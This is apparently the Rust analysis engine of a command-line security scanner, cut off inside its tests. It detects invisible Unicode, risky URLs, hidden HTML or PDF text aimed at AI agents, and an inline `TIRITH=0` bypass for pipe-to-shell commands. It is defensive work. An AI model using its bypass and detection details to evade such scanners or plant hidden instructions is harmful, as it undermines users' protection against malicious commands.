tirith_core/
engine.rs

1use std::time::Instant;
2
3use crate::extract::{self, ScanContext};
4use crate::normalize;
5use crate::policy::Policy;
6use crate::tokenize::ShellType;
7use crate::verdict::{Finding, Timings, Verdict};
8
/// Extract the raw path from a URL string before any normalization.
///
/// The path is the span that starts at the first `/` following the authority
/// and ends just before the first `?` or `#` (or at the end of the string).
///
/// Returns `None` when `raw` has no `://` separator or when the URL has no
/// path component. The authority is terminated by the first `/`, `?` or `#`,
/// so a `/` that only appears inside the query or fragment
/// (e.g. `http://host?next=/x`) is not mistaken for the start of the path.
fn extract_raw_path_from_url(raw: &str) -> Option<String> {
    let (_, after_scheme) = raw.split_once("://")?;

    // Find where the authority ends; only a `/` at that position opens a path.
    let authority_end = after_scheme.find(['/', '?', '#'])?;
    let from_path = &after_scheme[authority_end..];
    if !from_path.starts_with('/') {
        return None;
    }

    // Cut the query/fragment off the path, if any.
    let path_end = from_path.find(['?', '#']).unwrap_or(from_path.len());
    Some(from_path[..path_end].to_string())
}
21
22/// Analysis context passed through the pipeline.
23pub struct AnalysisContext {
24    pub input: String,
25    pub shell: ShellType,
26    pub scan_context: ScanContext,
27    pub raw_bytes: Option<Vec<u8>>,
28    pub interactive: bool,
29    pub cwd: Option<String>,
30    /// File path being scanned (only populated for ScanContext::FileScan).
31    pub file_path: Option<std::path::PathBuf>,
32    /// Only populated for ScanContext::FileScan. When None, configfile checks use
33    /// `file_path`'s parent as implicit repo root.
34    pub repo_root: Option<String>,
35    /// True when `file_path` was explicitly provided by the user as a config file.
36    pub is_config_override: bool,
37    /// Clipboard HTML content for rich-text paste analysis.
38    /// Only populated when `tirith paste --html <path>` is used.
39    pub clipboard_html: Option<String>,
40}
41
/// Report whether a `VAR=VALUE` word assigns `0` to `TIRITH`.
///
/// Any run of single or double quote characters at either end of the value is
/// ignored, so `TIRITH='0'` and `TIRITH="0"` both count.
fn is_tirith_zero_assignment(word: &str) -> bool {
    const QUOTES: &[char] = &['\'', '"'];

    // The name must be exactly `TIRITH`, i.e. the word starts with `TIRITH=`.
    let Some(value) = word.strip_prefix("TIRITH=") else {
        return false;
    };
    value.trim_matches(QUOTES) == "0"
}
53
54/// Check if the input contains an inline `TIRITH=0` bypass prefix.
55/// Handles POSIX bare prefix (`TIRITH=0 cmd`), env wrappers (`env -i TIRITH=0 cmd`),
56/// and PowerShell env syntax (`$env:TIRITH="0"; cmd`).
57fn find_inline_bypass(input: &str, shell: ShellType) -> bool {
58    use crate::tokenize;
59
60    if matches!(shell, ShellType::Posix | ShellType::Fish) {
61        let segments = tokenize::tokenize(input, shell);
62        // The documented bypass shape is `TIRITH=0 <cmd> | <interp>`. Multi-segment
63        // pipelines share an env (bypass applies to the whole pipeline), but
64        // sequencing operators (`&&`, `||`, `;`, `&`) start independent commands
65        // where bypass must NOT carry over.
66        if !all_pipe_separated(&segments) || has_unquoted_ampersand(input, shell) {
67            return false;
68        }
69    }
70
71    let words = split_raw_words(input, shell);
72    if words.is_empty() {
73        return false;
74    }
75
76    // POSIX / Fish (Fish 3.1+): leading `VAR=VALUE` assignments, then optionally
77    // an `env` wrapper, then the command. Walk past them looking for TIRITH=0.
78    let mut idx = 0;
79    while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
80        if is_tirith_zero_assignment(&words[idx]) {
81            return true;
82        }
83        idx += 1;
84    }
85
86    // If the first real word is `env`, parse its flags and assignments.
87    if idx < words.len() {
88        let cmd = words[idx].rsplit('/').next().unwrap_or(&words[idx]);
89        let cmd = cmd.trim_matches(|c: char| c == '\'' || c == '"');
90        if cmd == "env" {
91            idx += 1;
92            while idx < words.len() {
93                let w = &words[idx];
94                if w == "--" {
95                    idx += 1;
96                    break;
97                }
98                if tokenize::is_env_assignment(w) {
99                    if is_tirith_zero_assignment(w) {
100                        return true;
101                    }
102                    idx += 1;
103                    continue;
104                }
105                if w.starts_with('-') {
106                    if w.starts_with("--") {
107                        if env_long_flag_takes_value(w) && !w.contains('=') {
108                            idx += 2;
109                        } else {
110                            idx += 1;
111                        }
112                        continue;
113                    }
114                    // Short flags that take a separate value arg.
115                    if w == "-u" || w == "-C" || w == "-S" {
116                        idx += 2;
117                        continue;
118                    }
119                    idx += 1;
120                    continue;
121                }
122                // Non-flag, non-assignment: this is the command word.
123                break;
124            }
125            while idx < words.len() && tokenize::is_env_assignment(&words[idx]) {
126                if is_tirith_zero_assignment(&words[idx]) {
127                    return true;
128                }
129                idx += 1;
130            }
131        }
132    }
133
134    // PowerShell: `$env:TIRITH="0"` (single word) or `$env:TIRITH = "0"` (spaced).
135    if shell == ShellType::PowerShell {
136        for word in &words {
137            if is_powershell_tirith_bypass(word) {
138                return true;
139            }
140        }
141        if words.len() >= 3 {
142            for window in words.windows(3) {
143                if is_powershell_env_ref(&window[0], "TIRITH")
144                    && window[1] == "="
145                    && strip_surrounding_quotes(&window[2]) == "0"
146                {
147                    return true;
148                }
149            }
150        }
151    }
152
153    // cmd.exe: `set TIRITH="0"` stores the literal `"0"` (with quotes), so only
154    // bare `TIRITH=0` and whole-token-quoted `"TIRITH=0"` are real bypasses.
155    // Inner double quotes and any single quotes must NOT be stripped.
156    if shell == ShellType::Cmd && words.len() >= 2 {
157        let first = words[0].to_lowercase();
158        if first == "set" {
159            let second = strip_double_quotes_only(&words[1]);
160            if let Some((name, val)) = second.split_once('=') {
161                if name == "TIRITH" && val == "0" {
162                    return true;
163                }
164            }
165        }
166    }
167
168    false
169}
170
/// Report whether a long `env` option (with or without an inline `=value`)
/// is one of the options that expects a value.
fn env_long_flag_takes_value(flag: &str) -> bool {
    const VALUE_FLAGS: [&str; 3] = ["--unset", "--chdir", "--split-string"];

    // Compare only the option name, i.e. whatever precedes the first `=`.
    let name = match flag.find('=') {
        Some(eq) => &flag[..eq],
        None => flag,
    };
    VALUE_FLAGS.contains(&name)
}
175
176/// Check if a word is `$env:TIRITH=0` with optional quotes around the value.
177/// The `$env:` prefix is matched case-insensitively (PowerShell convention).
178fn is_powershell_tirith_bypass(word: &str) -> bool {
179    if !word.starts_with('$') || word.len() < "$env:TIRITH=0".len() {
180        return false;
181    }
182    let after_dollar = &word[1..];
183    if !after_dollar
184        .get(..4)
185        .is_some_and(|s| s.eq_ignore_ascii_case("env:"))
186    {
187        return false;
188    }
189    let after_env = &after_dollar[4..];
190    if !after_env
191        .get(..7)
192        .is_some_and(|s| s.eq_ignore_ascii_case("TIRITH="))
193    {
194        return false;
195    }
196    let value = &after_env[7..];
197    strip_surrounding_quotes(value) == "0"
198}
199
/// Report whether `word` is exactly the PowerShell environment reference
/// `$env:<var_name>` with no assignment attached.
///
/// The `env:` prefix and the variable name are both compared ASCII
/// case-insensitively.
fn is_powershell_env_ref(word: &str, var_name: &str) -> bool {
    let Some(rest) = word.strip_prefix('$') else {
        return false;
    };
    // Split after the 4-byte `env:` prefix; `get` fails on short input or when
    // byte 4 is not a char boundary.
    match (rest.get(..4), rest.get(4..)) {
        (Some(prefix), Some(name)) => {
            prefix.eq_ignore_ascii_case("env:") && name.eq_ignore_ascii_case(var_name)
        }
        _ => false,
    }
}
214
/// Remove one layer of matching quotes (`"…"` or `'…'`) from around `s`.
///
/// Anything that is not wrapped in a matching pair is returned unchanged.
fn strip_surrounding_quotes(s: &str) -> &str {
    for quote in ['"', '\''] {
        // Both ends must carry the same quote character; a lone quote has
        // nothing left for the suffix to match.
        if let Some(inner) = s
            .strip_prefix(quote)
            .and_then(|rest| rest.strip_suffix(quote))
        {
            return inner;
        }
    }
    s
}
225
/// Remove one layer of surrounding double quotes from `s`, if present.
///
/// Single quotes are left in place because cmd.exe treats them as literal
/// characters.
fn strip_double_quotes_only(s: &str) -> &str {
    s.strip_prefix('"')
        .and_then(|rest| rest.strip_suffix('"'))
        .unwrap_or(s)
}
234
235/// Split input into raw words respecting quotes (for bypass/self-invocation parsing).
236/// Unlike tokenize(), this doesn't split on pipes/semicolons — just whitespace-splits
237/// the raw input to inspect the first segment's words.
238///
239/// Shell-aware: POSIX uses backslash as escape inside double-quotes and bare context;
240/// PowerShell uses backtick (`` ` ``) instead.
241fn split_raw_words(input: &str, shell: ShellType) -> Vec<String> {
242    let escape_char = match shell {
243        ShellType::PowerShell => '`',
244        ShellType::Cmd => '^',
245        _ => '\\',
246    };
247
248    // Stop at the first unquoted segment boundary — we only care about the
249    // first command's words for bypass detection.
250    let mut words = Vec::new();
251    let mut current = String::new();
252    let chars: Vec<char> = input.chars().collect();
253    let len = chars.len();
254    let mut i = 0;
255
256    while i < len {
257        let ch = chars[i];
258        match ch {
259            ' ' | '\t' if !current.is_empty() => {
260                words.push(current.clone());
261                current.clear();
262                i += 1;
263                while i < len && (chars[i] == ' ' || chars[i] == '\t') {
264                    i += 1;
265                }
266            }
267            ' ' | '\t' => {
268                i += 1;
269            }
270            '|' | '\n' | '&' => break,
271            ';' if shell != ShellType::Cmd => break,
272            '#' if shell == ShellType::PowerShell => break,
273            '\'' if shell != ShellType::Cmd => {
274                current.push(ch);
275                i += 1;
276                while i < len && chars[i] != '\'' {
277                    current.push(chars[i]);
278                    i += 1;
279                }
280                if i < len {
281                    current.push(chars[i]);
282                    i += 1;
283                }
284            }
285            '"' => {
286                current.push(ch);
287                i += 1;
288                while i < len && chars[i] != '"' {
289                    if chars[i] == escape_char && i + 1 < len {
290                        current.push(chars[i]);
291                        current.push(chars[i + 1]);
292                        i += 2;
293                    } else {
294                        current.push(chars[i]);
295                        i += 1;
296                    }
297                }
298                if i < len {
299                    current.push(chars[i]);
300                    i += 1;
301                }
302            }
303            c if c == escape_char && i + 1 < len => {
304                current.push(chars[i]);
305                current.push(chars[i + 1]);
306                i += 2;
307            }
308            _ => {
309                current.push(ch);
310                i += 1;
311            }
312        }
313    }
314    if !current.is_empty() {
315        words.push(current);
316    }
317    words
318}
319
320/// Whether all non-leading segments are joined only by pipe operators (`|`, `|&`).
321///
322/// Returns `true` for a single segment. Used to distinguish the documented
323/// `TIRITH=0 cmd | interp` bypass shape from sequencing chains like
324/// `TIRITH=0 cmd && evil` where the bypass must not apply to the second command.
325fn all_pipe_separated(segments: &[crate::tokenize::Segment]) -> bool {
326    segments
327        .iter()
328        .skip(1)
329        .all(|s| matches!(s.preceding_separator.as_deref(), Some("|") | Some("|&")))
330}
331
332/// Check if input contains an unquoted `&` (backgrounding operator).
333fn has_unquoted_ampersand(input: &str, shell: ShellType) -> bool {
334    let escape_char = match shell {
335        ShellType::PowerShell => '`',
336        ShellType::Cmd => '^',
337        _ => '\\',
338    };
339    let chars: Vec<char> = input.chars().collect();
340    let len = chars.len();
341    let mut i = 0;
342    while i < len {
343        match chars[i] {
344            '\'' if shell != ShellType::Cmd => {
345                i += 1;
346                while i < len && chars[i] != '\'' {
347                    i += 1;
348                }
349                if i < len {
350                    i += 1;
351                }
352            }
353            '"' => {
354                i += 1;
355                while i < len && chars[i] != '"' {
356                    if chars[i] == escape_char && i + 1 < len {
357                        i += 2;
358                    } else {
359                        i += 1;
360                    }
361                }
362                if i < len {
363                    i += 1;
364                }
365            }
366            c if c == escape_char && i + 1 < len => {
367                i += 2;
368            }
369            '&' => return true,
370            _ => i += 1,
371        }
372    }
373    false
374}
375
376/// Run the tiered analysis pipeline.
377pub fn analyze(ctx: &AnalysisContext) -> Verdict {
378    analyze_inner(ctx).0
379}
380
381/// Run the tiered analysis pipeline, returning the loaded policy alongside the verdict.
382///
383/// Use this from enforcement callers (check, gateway, MCP) that need the policy
384/// for post-processing — avoids a redundant `Policy::discover()` call.
385pub fn analyze_returning_policy(ctx: &AnalysisContext) -> (Verdict, Policy) {
386    analyze_inner(ctx)
387}
388
389/// Shared implementation for `analyze()` and `analyze_returning_policy()`.
390fn analyze_inner(ctx: &AnalysisContext) -> (Verdict, Policy) {
391    let start = Instant::now();
392
393    let tier0_start = Instant::now();
394    let bypass_env = std::env::var("TIRITH").ok().as_deref() == Some("0");
395    // Inline bypass (`TIRITH=0 cmd | sh`) is honored ONLY in Exec context.
396    // Paste content is attacker-controllable (clipboard can be crafted) and
397    // FileScan has no notion of a typed prefix, so a `TIRITH=0` token in those
398    // contexts must not grant bypass. Process-level TIRITH=0 env still applies
399    // in every context.
400    let bypass_inline =
401        ctx.scan_context == ScanContext::Exec && find_inline_bypass(&ctx.input, ctx.shell);
402    let bypass_requested = bypass_env || bypass_inline;
403    let tier0_ms = tier0_start.elapsed().as_secs_f64() * 1000.0;
404
405    let tier1_start = Instant::now();
406
407    // Paste-only: byte-level scan catches control chars that never make it
408    // into the URL/regex view.
409    let byte_scan_triggered = if ctx.scan_context == ScanContext::Paste {
410        if let Some(ref bytes) = ctx.raw_bytes {
411            let scan = extract::scan_bytes(bytes);
412            scan.has_ansi_escapes
413                || scan.has_control_chars
414                || scan.has_bidi_controls
415                || scan.has_zero_width
416                || scan.has_invalid_utf8
417                || scan.has_unicode_tags
418                || scan.has_variation_selectors
419                || scan.has_invisible_math_operators
420                || scan.has_invisible_whitespace
421                || scan.has_hangul_fillers
422                || scan.has_confusable_text
423        } else {
424            false
425        }
426    } else {
427        false
428    };
429
430    let regex_triggered = extract::tier1_scan(&ctx.input, ctx.scan_context);
431
432    // Exec-only: catch bidi/zero-width/invisible bytes even when no URL fired.
433    // `tirith diff/score/why/receipt/explain` URLs typed by the user are
434    // carved out because they're inspection targets — only the eight Unicode-
435    // style rule classes filtered at tier 3 are affected by this carveout.
436    let inert_range = if ctx.scan_context == ScanContext::Exec {
437        extract::tirith_inert_arg_range(&ctx.input, ctx.shell)
438    } else {
439        None
440    };
441    let exec_bidi_triggered = if ctx.scan_context == ScanContext::Exec {
442        let scan = extract::scan_bytes(ctx.input.as_bytes());
443        let scan = match inert_range.as_ref() {
444            Some(r) => scan.with_ignored_range(r),
445            None => scan,
446        };
447        scan.has_bidi_controls
448            || scan.has_zero_width
449            || scan.has_unicode_tags
450            || scan.has_variation_selectors
451            || scan.has_invisible_math_operators
452            || scan.has_invisible_whitespace
453            || scan.has_hangul_fillers
454            || scan.has_confusable_text
455    } else {
456        false
457    };
458
459    let tier1_ms = tier1_start.elapsed().as_secs_f64() * 1000.0;
460
461    if !byte_scan_triggered && !regex_triggered && !exec_bidi_triggered {
462        let total_ms = start.elapsed().as_secs_f64() * 1000.0;
463        return (
464            Verdict::allow_fast(
465                1,
466                Timings {
467                    tier0_ms,
468                    tier1_ms,
469                    tier2_ms: None,
470                    tier3_ms: None,
471                    total_ms,
472                },
473            ),
474            // discover_partial is local-only and cheap; callers still need DLP
475            // patterns for audit redaction even on fast-exit.
476            Policy::discover_partial(ctx.cwd.as_deref()),
477        );
478    }
479
480    let tier2_start = Instant::now();
481
482    if bypass_requested {
483        let policy = Policy::discover_partial(ctx.cwd.as_deref());
484        let allow_bypass = if ctx.interactive {
485            policy.allow_bypass_env
486        } else {
487            policy.allow_bypass_env_noninteractive
488        };
489
490        if allow_bypass {
491            let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;
492            let total_ms = start.elapsed().as_secs_f64() * 1000.0;
493            let mut verdict = Verdict::allow_fast(
494                2,
495                Timings {
496                    tier0_ms,
497                    tier1_ms,
498                    tier2_ms: Some(tier2_ms),
499                    tier3_ms: None,
500                    total_ms,
501                },
502            );
503            verdict.bypass_requested = true;
504            verdict.bypass_honored = true;
505            verdict.interactive_detected = ctx.interactive;
506            verdict.policy_path_used = policy.path.clone();
507            crate::audit::log_verdict(
508                &verdict,
509                &ctx.input,
510                None,
511                None,
512                &policy.dlp_custom_patterns,
513            );
514            return (verdict, policy);
515        }
516    }
517
518    let mut policy = Policy::discover(ctx.cwd.as_deref());
519    policy.load_user_lists();
520    policy.load_org_lists(ctx.cwd.as_deref());
521    policy.load_trust_entries(ctx.cwd.as_deref());
522
523    // Fail-open: None when the DB is unavailable.
524    let threat_db: Option<std::sync::Arc<crate::threatdb::ThreatDb>> =
525        crate::threatdb::ThreatDb::cached();
526
527    let tier2_ms = tier2_start.elapsed().as_secs_f64() * 1000.0;
528
529    let tier3_start = Instant::now();
530    let mut findings = Vec::new();
531
532    let mut extracted = Vec::new();
533
534    if ctx.scan_context == ScanContext::FileScan {
535        // FileScan runs byte-scan + configfile/codefile/rendered rules only.
536        // It does NOT run command/env/URL-extraction rules — the input isn't a
537        // command line, so those rules would produce nonsense findings.
538        let byte_input = if let Some(ref bytes) = ctx.raw_bytes {
539            bytes.as_slice()
540        } else {
541            ctx.input.as_bytes()
542        };
543        let byte_findings = crate::rules::terminal::check_bytes(byte_input);
544        findings.extend(byte_findings);
545
546        findings.extend(crate::rules::configfile::check(
547            &ctx.input,
548            ctx.file_path.as_deref(),
549            ctx.repo_root.as_deref().map(std::path::Path::new),
550            ctx.is_config_override,
551        ));
552
553        if crate::rules::codefile::is_code_file(
554            ctx.file_path.as_deref().and_then(|p| p.to_str()),
555            &ctx.input,
556        ) {
557            findings.extend(crate::rules::codefile::check(
558                &ctx.input,
559                ctx.file_path.as_deref().and_then(|p| p.to_str()),
560            ));
561        }
562
563        if crate::rules::rendered::is_renderable_file(ctx.file_path.as_deref()) {
564            // PDFs need their own parser; everything else is treated as text.
565            let is_pdf = ctx
566                .file_path
567                .as_deref()
568                .and_then(|p| p.extension())
569                .and_then(|e| e.to_str())
570                .map(|e| e.eq_ignore_ascii_case("pdf"))
571                .unwrap_or(false);
572
573            if is_pdf {
574                let pdf_bytes = ctx.raw_bytes.as_deref().unwrap_or(ctx.input.as_bytes());
575                findings.extend(crate::rules::rendered::check_pdf(pdf_bytes));
576            } else {
577                findings.extend(crate::rules::rendered::check(
578                    &ctx.input,
579                    ctx.file_path.as_deref(),
580                ));
581            }
582        }
583    } else {
584        if ctx.scan_context == ScanContext::Paste {
585            if let Some(ref bytes) = ctx.raw_bytes {
586                let byte_findings = crate::rules::terminal::check_bytes(bytes);
587                findings.extend(byte_findings);
588            }
589            let multiline_findings = crate::rules::terminal::check_hidden_multiline(&ctx.input);
590            findings.extend(multiline_findings);
591
592            if let Some(ref html) = ctx.clipboard_html {
593                let clipboard_findings =
594                    crate::rules::terminal::check_clipboard_html(html, &ctx.input);
595                findings.extend(clipboard_findings);
596            }
597        }
598
599        if ctx.scan_context == ScanContext::Exec {
600            let byte_input = ctx.input.as_bytes();
601            let scan = extract::scan_bytes(byte_input);
602            // Same inert-range carveout as tier-1 so tier-3 findings agree
603            // with `exec_bidi_triggered`.
604            let scan = match inert_range.as_ref() {
605                Some(r) => scan.with_ignored_range(r),
606                None => scan,
607            };
608            if scan.has_bidi_controls
609                || scan.has_zero_width
610                || scan.has_unicode_tags
611                || scan.has_variation_selectors
612                || scan.has_invisible_math_operators
613                || scan.has_invisible_whitespace
614                || scan.has_hangul_fillers
615                || scan.has_confusable_text
616            {
617                // Push the inert range down into check_bytes itself: rules
618                // emitting `Evidence::Text` (e.g. UnicodeTags) have no byte
619                // offset to post-filter against, so they must be suppressed
620                // at scan time.
621                let ignore_ranges: &[std::ops::Range<usize>] = inert_range.as_slice();
622                let byte_findings =
623                    crate::rules::terminal::check_bytes_with_ignore(byte_input, ignore_ranges);
624                // Exec context keeps invisible-char findings only — ANSI/control
625                // escape rules don't apply to typed commands.
626                findings.extend(byte_findings.into_iter().filter(|f| {
627                    matches!(
628                        f.rule_id,
629                        crate::verdict::RuleId::BidiControls
630                            | crate::verdict::RuleId::ZeroWidthChars
631                            | crate::verdict::RuleId::UnicodeTags
632                            | crate::verdict::RuleId::InvisibleMathOperator
633                            | crate::verdict::RuleId::VariationSelector
634                            | crate::verdict::RuleId::InvisibleWhitespace
635                            | crate::verdict::RuleId::HangulFiller
636                            | crate::verdict::RuleId::ConfusableText
637                    )
638                }));
639            }
640        }
641
642        extracted = extract::extract_urls(&ctx.input, ctx.shell);
643
644        for url_info in &extracted {
645            // url::Url percent-encodes non-ASCII on parse, so non-ASCII path
646            // rules need the raw (pre-parse) path instead.
647            let raw_path = extract_raw_path_from_url(&url_info.raw);
648            let normalized_path = url_info.parsed.path().map(normalize::normalize_path);
649
650            let hostname_findings = crate::rules::hostname::check(&url_info.parsed, &policy);
651            findings.extend(hostname_findings);
652
653            let path_findings = crate::rules::path::check(
654                &url_info.parsed,
655                normalized_path.as_ref(),
656                raw_path.as_deref(),
657            );
658            findings.extend(path_findings);
659
660            let transport_findings =
661                crate::rules::transport::check(&url_info.parsed, url_info.in_sink_context);
662            findings.extend(transport_findings);
663
664            let ecosystem_findings = crate::rules::ecosystem::check(&url_info.parsed);
665            findings.extend(ecosystem_findings);
666        }
667
668        // Threat intel rules are a local DB lookup — no network I/O on the hot path.
669        let threat_findings = crate::rules::threatintel::check(
670            &ctx.input,
671            ctx.shell,
672            &extracted,
673            threat_db.as_deref(),
674        );
675        findings.extend(threat_findings);
676
677        let command_findings = crate::rules::command::check(
678            &ctx.input,
679            ctx.shell,
680            ctx.cwd.as_deref(),
681            ctx.scan_context,
682        );
683        findings.extend(command_findings);
684
685        let cred_findings =
686            crate::rules::credential::check(&ctx.input, ctx.shell, ctx.scan_context);
687        findings.extend(cred_findings);
688
689        let env_findings = crate::rules::environment::check(&crate::rules::environment::RealEnv);
690        findings.extend(env_findings);
691
692        if !policy.network_deny.is_empty() {
693            let net_findings = crate::rules::command::check_network_policy(
694                &ctx.input,
695                ctx.shell,
696                &policy.network_deny,
697                &policy.network_allow,
698            );
699            findings.extend(net_findings);
700        }
701    }
702
703    if !policy.custom_rules.is_empty() {
704        let compiled = crate::rules::custom::compile_rules(&policy.custom_rules);
705        let custom_findings = crate::rules::custom::check(&ctx.input, ctx.scan_context, &compiled);
706        findings.extend(custom_findings);
707    }
708
709    for finding in &mut findings {
710        if let Some(override_sev) = policy.severity_override(&finding.rule_id) {
711            finding.severity = override_sev;
712        }
713    }
714
715    // A blocklist hit on any extracted URL yields a fresh Critical finding so
716    // the final verdict escalates to Block regardless of other rules.
717    for url_info in &extracted {
718        if policy.is_blocklisted(&url_info.raw) {
719            findings.push(Finding {
720                rule_id: crate::verdict::RuleId::PolicyBlocklisted,
721                severity: crate::verdict::Severity::Critical,
722                title: "URL matches blocklist".to_string(),
723                description: format!("URL '{}' matches a blocklist pattern", url_info.raw),
724                evidence: vec![crate::verdict::Evidence::Url {
725                    raw: url_info.raw.clone(),
726                }],
727                human_view: None,
728                agent_view: None,
729                mitre_id: None,
730                custom_rule_id: None,
731            });
732        }
733    }
734
735    // Allowlist drops findings whose URLs are allowlisted, but blocklist wins
736    // when both match: blocklisted URLs keep their findings.
737    if !policy.allowlist.is_empty() || !policy.allowlist_rules.is_empty() {
738        let blocklisted_urls: Vec<&str> = extracted
739            .iter()
740            .filter(|u| policy.is_blocklisted(&u.raw))
741            .map(|u| u.raw.as_str())
742            .collect();
743
744        findings.retain(|f| {
745            let urls_in_evidence: Vec<&str> = f
746                .evidence
747                .iter()
748                .filter_map(|e| match e {
749                    crate::verdict::Evidence::Url { raw } => Some(raw.as_str()),
750                    _ => None,
751                })
752                .collect();
753
754            if urls_in_evidence.is_empty() {
755                return true;
756            }
757
758            let rule_allowlisted = |url: &str| {
759                policy.is_allowlisted_for_rule(&f.rule_id.to_string(), url)
760                    || f.custom_rule_id.as_deref().is_some_and(|custom_rule_id| {
761                        policy.is_allowlisted_for_rule(custom_rule_id, url)
762                    })
763            };
764
765            // Keep when any referenced URL is blocklisted; otherwise drop only
766            // if every referenced URL is allowlisted for this finding.
767            urls_in_evidence
768                .iter()
769                .any(|url| blocklisted_urls.contains(url))
770                || !urls_in_evidence
771                    .iter()
772                    .all(|url| policy.is_allowlisted(url) || rule_allowlisted(url))
773        });
774    }
775
776    enrich_pro(&mut findings);
777    enrich_team(&mut findings);
778
779    crate::rule_metadata::filter_early_access(&mut findings, crate::license::Tier::Enterprise);
780
781    let tier3_ms = tier3_start.elapsed().as_secs_f64() * 1000.0;
782    let total_ms = start.elapsed().as_secs_f64() * 1000.0;
783
784    let mut verdict = Verdict::from_findings(
785        findings,
786        3,
787        Timings {
788            tier0_ms,
789            tier1_ms,
790            tier2_ms: Some(tier2_ms),
791            tier3_ms: Some(tier3_ms),
792            total_ms,
793        },
794    );
795    verdict.bypass_requested = bypass_requested;
796    verdict.bypass_available = if ctx.interactive {
797        policy.allow_bypass_env
798    } else {
799        policy.allow_bypass_env_noninteractive
800    };
801    verdict.interactive_detected = ctx.interactive;
802    verdict.policy_path_used = policy.path.clone();
803    verdict.urls_extracted_count = Some(extracted.len());
804
805    (verdict, policy)
806}
807
808/// Filter a verdict's findings by paranoia level.
809///
810/// Output-layer only — the engine always detects everything. CLI/MCP call
811/// this after `analyze()` to reduce noise at lower paranoia levels.
812///
813/// - Paranoia 1-2: Medium+ findings only
814/// - Paranoia 3: also show Low findings
815/// - Paranoia 4: also show Info findings
816pub fn filter_findings_by_paranoia(verdict: &mut Verdict, paranoia: u8) {
817    retain_by_paranoia(&mut verdict.findings, paranoia);
818    verdict.action = recalculate_action(&verdict.findings);
819}
820
821/// Filter a Vec<Finding> by paranoia level.
822/// Same logic as `filter_findings_by_paranoia` but operates on raw findings.
823pub fn filter_findings_by_paranoia_vec(findings: &mut Vec<Finding>, paranoia: u8) {
824    retain_by_paranoia(findings, paranoia);
825}
826
827/// Recalculate verdict action from the current findings (same logic as `Verdict::from_findings`).
828fn recalculate_action(findings: &[Finding]) -> crate::verdict::Action {
829    use crate::verdict::{Action, Severity};
830    if findings.is_empty() {
831        return Action::Allow;
832    }
833    let max_severity = findings
834        .iter()
835        .map(|f| f.severity)
836        .max()
837        .unwrap_or(Severity::Low);
838    match max_severity {
839        Severity::Critical | Severity::High => Action::Block,
840        Severity::Medium | Severity::Low => Action::Warn,
841        Severity::Info => Action::Allow,
842    }
843}
844
845/// Shared paranoia retention logic.
846fn retain_by_paranoia(findings: &mut Vec<Finding>, paranoia: u8) {
847    let effective = paranoia.min(4);
848
849    findings.retain(|f| match f.severity {
850        crate::verdict::Severity::Info => effective >= 4,
851        crate::verdict::Severity::Low => effective >= 3,
852        _ => true,
853    });
854}
855
856/// Pro enrichment: dual-view, decoded content, cloaking diffs, line numbers.
857fn enrich_pro(findings: &mut [Finding]) {
858    for finding in findings.iter_mut() {
859        match finding.rule_id {
860            // Rendered-content findings carry a dual view: what the human sees
861            // vs. what the AI agent processes.
862            crate::verdict::RuleId::HiddenCssContent => {
863                finding.human_view =
864                    Some("Content hidden via CSS — invisible in rendered view".into());
865                finding.agent_view = Some(format!(
866                    "AI agent sees full text including CSS-hidden content. {}",
867                    evidence_summary(&finding.evidence)
868                ));
869            }
870            crate::verdict::RuleId::HiddenColorContent => {
871                finding.human_view =
872                    Some("Text blends with background — invisible to human eye".into());
873                finding.agent_view = Some(format!(
874                    "AI agent reads text regardless of color contrast. {}",
875                    evidence_summary(&finding.evidence)
876                ));
877            }
878            crate::verdict::RuleId::HiddenHtmlAttribute => {
879                finding.human_view =
880                    Some("Elements marked hidden/aria-hidden — not displayed".into());
881                finding.agent_view = Some(format!(
882                    "AI agent processes hidden element content. {}",
883                    evidence_summary(&finding.evidence)
884                ));
885            }
886            crate::verdict::RuleId::HtmlComment => {
887                finding.human_view = Some("HTML comments not rendered in browser".into());
888                finding.agent_view = Some(format!(
889                    "AI agent reads comment content as context. {}",
890                    evidence_summary(&finding.evidence)
891                ));
892            }
893            crate::verdict::RuleId::MarkdownComment => {
894                finding.human_view = Some("Markdown comments not rendered in preview".into());
895                finding.agent_view = Some(format!(
896                    "AI agent processes markdown comment content. {}",
897                    evidence_summary(&finding.evidence)
898                ));
899            }
900            crate::verdict::RuleId::PdfHiddenText => {
901                finding.human_view = Some("Sub-pixel text invisible in PDF viewer".into());
902                finding.agent_view = Some(format!(
903                    "AI agent extracts all text including sub-pixel content. {}",
904                    evidence_summary(&finding.evidence)
905                ));
906            }
907            crate::verdict::RuleId::ClipboardHidden => {
908                finding.human_view =
909                    Some("Hidden content in clipboard HTML not visible in paste preview".into());
910                finding.agent_view = Some(format!(
911                    "AI agent processes full clipboard including hidden HTML. {}",
912                    evidence_summary(&finding.evidence)
913                ));
914            }
915            _ => {}
916        }
917    }
918}
919
920/// Summarize evidence entries for enrichment text.
921fn evidence_summary(evidence: &[crate::verdict::Evidence]) -> String {
922    let details: Vec<&str> = evidence
923        .iter()
924        .filter_map(|e| {
925            if let crate::verdict::Evidence::Text { detail } = e {
926                Some(detail.as_str())
927            } else {
928                None
929            }
930        })
931        .take(3)
932        .collect();
933    if details.is_empty() {
934        String::new()
935    } else {
936        format!("Details: {}", details.join("; "))
937    }
938}
939
940/// Team enrichment: MITRE ATT&CK classification.
941/// Uses the generated `mitre_id_for_rule` from `rule_explanations.toml` (single source of truth).
942fn enrich_team(findings: &mut [Finding]) {
943    for finding in findings.iter_mut() {
944        if finding.mitre_id.is_none() {
945            finding.mitre_id =
946                crate::rule_explanations::mitre_id_for_rule(finding.rule_id).map(String::from);
947        }
948    }
949}
950
951#[cfg(test)]
952mod tests {
953    use super::*;
954    #[test]
955    fn test_exec_bidi_without_url() {
956        // Bidi control alone (no URL) must reach tier 3; else the exec path
957        // would fast-exit and miss the attack.
958        let input = format!("echo hello{}world", '\u{202E}');
959        let ctx = AnalysisContext {
960            input,
961            shell: ShellType::Posix,
962            scan_context: ScanContext::Exec,
963            raw_bytes: None,
964            interactive: true,
965            cwd: None,
966            file_path: None,
967            repo_root: None,
968            is_config_override: false,
969            clipboard_html: None,
970        };
971        let verdict = analyze(&ctx);
972        assert!(
973            verdict.tier_reached >= 3,
974            "bidi in exec should reach tier 3, got tier {}",
975            verdict.tier_reached
976        );
977        assert!(
978            verdict
979                .findings
980                .iter()
981                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::BidiControls)),
982            "should detect bidi controls in exec context"
983        );
984    }
985
986    #[test]
987    fn test_paranoia_filter_suppresses_info_low() {
